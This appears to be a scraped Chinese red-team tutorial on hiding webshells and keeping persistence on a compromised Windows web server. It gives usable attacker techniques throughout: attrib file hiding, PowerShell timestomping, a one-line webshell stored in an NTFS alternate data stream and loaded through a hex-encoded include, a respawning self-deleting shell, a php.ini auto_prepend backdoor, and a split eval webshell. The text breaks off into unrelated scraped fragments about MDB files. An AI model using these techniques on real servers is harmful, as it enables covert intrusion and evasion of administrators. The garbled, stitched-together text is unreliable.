在紅藍對抗中,我們在拿下乙個伺服器之後該如何讓許可權維持的久一些而不被管理員輕易的發現 ,除了webshell要免殺,還需要注意一些隱藏技巧,因此就要在我們上傳的木馬動點手腳想辦法不被管理員以及檢測工具快速的發現。
使用attrib +s +a +h +r命令就是把原本的資料夾增加了系統檔案屬性、存檔檔案屬性、唯讀檔案屬性和隱藏檔案屬性。
引數說明:
+r 設定唯讀屬性
-r 取消唯讀屬性
+a 設定存檔屬性
-a 取消存檔屬性
+s 設定系統屬性
-s 取消系統屬性
+h 設定隱藏屬性
-h 取消隱藏屬性
/s 顯示目錄下所有檔案的屬性
/d 將attrib和任意命令列選項應用到目錄
attrib +s +a +h +r shell.php //隱藏shell.php檔案
set-itemproperty -path 2.txt lastwritetime -value "2020-11-01 12:12:12" //修改時間修改
set-itemproperty -path 2.txt lastaccesstime -value "2020-11-01 12:12:12" //訪問時間修改
set-itemproperty -path 2.txt creationtime -value "2020-11-01 12:12:12" //建立時間修改
使用命令獲取檔案屬性:
get-itemproperty -path d:\1.dll | format-list -property * -force
powershell.exe -command "ls 'test\*.*' | foreach-object "
通過在命令列中echo乙個資料流從而建立乙個ads隱藏檔案
我們只能看見乙個index.php檔案,且內容為空,常規的檔案管理器、type命令,dir命令、del命令發現都找不出那個shell.jpg的。通過命令列輸入完整的檔名即可通過notepad進行編輯,可以看到我們echo進去的一句話木馬。
雖然我們已經將檔案隱藏了,但是木馬並不能夠起作用,這裡就需要用到檔案包含,利用include函式,mm.php:shell.jpg進行hex編碼,把這個ads檔案include進去,這樣子就可以正常解析我們的一句話了。
<?php @include(pack('h*','6d6d2e7068703a7368656c6c2e6a7067'));?>
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__file__); //刪除自身while(1)
?>
在每次刪除後的10秒鐘之後又會重新生成乙個新的shell.php檔案,若要徹底刪除檔案最好的方法是將web服務停止了再刪除。
php.ini 中可以指定在主檔案執行前後自動解析的檔名稱,常用於頁面公共頭部和尾部,也可以用來隱藏php後門。
;在php文件之前自動新增檔案。
auto_prepend_file = "c:\tmp.txt"
;在php文件之後自動新增檔案。
auto_prepend_file = "c:\tmp.txt"
訪問任意乙個php檔案即可獲取webshell。
1.php內容:
<?php
$a=$_post['x'];?>
2.php內容:
<?php include "1.php";
@eval($a);?>
直接訪問2.php即可獲取webshel shape檔案匯入mdb檔案
構造mdb,並在其中構造要素資料集,將shape檔案都匯入該要素資料集中 using system using system.collections.generic using system.io using system.threading using esri.arcgis.geodatabas...
建立乙個MDB檔案
昨天令狐說需要用到access資料庫,又不想裝office,在群裡徵求辦法。我建議的辦法是用delphi bcb自帶的sql explorer通過bde over odbc連線access資料庫,這樣就可以修改庫結構,及使用sql語句進行大部分資料庫操作。但是有乙個問題就是不能建立乙個空的資料庫檔案...
建立乙個MDB檔案
昨天令狐說需要用到access資料庫,又不想裝office,在群裡徵求辦法。我建議的辦法是用delphi bcb自帶的sql explorer通過bde over odbc連線access資料庫,這樣就可以修改庫結構,及使用sql語句進行大部分資料庫操作。但是有乙個問題就是不能建立乙個空的資料庫檔案...